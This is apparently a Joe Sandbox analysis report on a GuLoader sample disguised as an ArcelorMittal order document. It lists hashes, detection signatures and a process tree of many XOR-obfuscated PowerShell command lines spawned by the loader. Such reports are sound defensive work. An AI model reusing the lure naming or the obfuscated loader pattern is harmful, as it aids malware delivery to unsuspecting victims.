Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Overview

General Information

Sample Name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Analysis ID:716470
MD5:297cee2e9339ab19cb96a073ca8ba85f
SHA1:b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
SHA256:9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
Tags:exe
Infos:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Executable has a suspicious name (potential lure to open the executable)
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Too many similar processes found
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe (PID: 5356 cmdline: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe MD5: 297CEE2E9339AB19CB96A073CA8BA85F)
    • powershell.exe (PID: 5932 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3424 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5148 cmdline: powershell.exe 0x3A3A41D7 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5528 cmdline: powershell.exe 0x656176C0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4768 cmdline: powershell.exe 0x46696EC0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5192 cmdline: powershell.exe 0x41286F85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5372 cmdline: powershell.exe 0x72342289 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2856 cmdline: powershell.exe 0x20692295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4196 cmdline: powershell.exe 0x78383295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4748 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 416 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3568 cmdline: powershell.exe 0x20302E85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5212 cmdline: powershell.exe 0x70203289 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5856 cmdline: powershell.exe 0x20692291 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3424 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5532 cmdline: powershell.exe 0x30783A95 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5476 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5648 cmdline: powershell.exe 0x30296B8B -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4056 cmdline: powershell.exe 0x723322FC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3116 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3036 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2840 cmdline: powershell.exe 0x3A3A54CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5520 cmdline: powershell.exe 0x727477C4 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6024 cmdline: powershell.exe 0x6C416EC9 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2920 cmdline: powershell.exe 0x6F632ACC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5792 cmdline: powershell.exe 0x302C6B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4904 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5544 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4744 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5892 cmdline: powershell.exe 0x30783195 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4396 cmdline: powershell.exe 0x30302E85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4176 cmdline: powershell.exe 0x692032DD -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5852 cmdline: powershell.exe 0x34302BD5 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1252 cmdline: powershell.exe 0x2E7233FC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5464 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5572 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5732 cmdline: powershell.exe 0x3A3A51C0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5836 cmdline: powershell.exe 0x74466BC9 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1896 cmdline: powershell.exe 0x65506DCC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4872 cmdline: powershell.exe 0x6E7467D7 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4628 cmdline: powershell.exe 0x28697096 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4332 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5696 cmdline: powershell.exe 0x31343091 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5108 cmdline: powershell.exe 0x202C22CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6076 cmdline: powershell.exe 0x20302ECC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5832 cmdline: powershell.exe 0x20302BCC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5532 cmdline: powershell.exe 0x2E7230FC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5668 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4768 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2108 cmdline: powershell.exe 0x3A3A50C0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3352 cmdline: powershell.exe 0x616444CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3724 cmdline: powershell.exe 0x6C652ACC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5164 cmdline: powershell.exe 0x72332E85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2304 cmdline: powershell.exe 0x69207094 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1872 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2948 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5416 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4196 cmdline: powershell.exe 0x2C2A6B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 5356JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeReversingLabs: Detection: 73%
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeMetadefender: Detection: 33%Perma Link
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00406375 FindFirstFileW,FindClose,0_2_00406375
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405823
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_004052D0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D0
    Source: conhost.exeProcess created: 57

    System Summary

    barindex
    Initial sample is a PE file and has a suspicious name
    Source: initial sampleStatic PE information: Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
    Source: initial sampleStatic PE information: Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
    Executable has a suspicious name (potential lure to open the executable)
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic file information: Suspicious name
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040327D
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 0_2_00404B0D0_2_00404B0D
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: invalid certificate
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeReversingLabs: Detection: 73%
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeMetadefender: Detection: 33%
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile read: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeJump to behavior
    Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x70203289 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
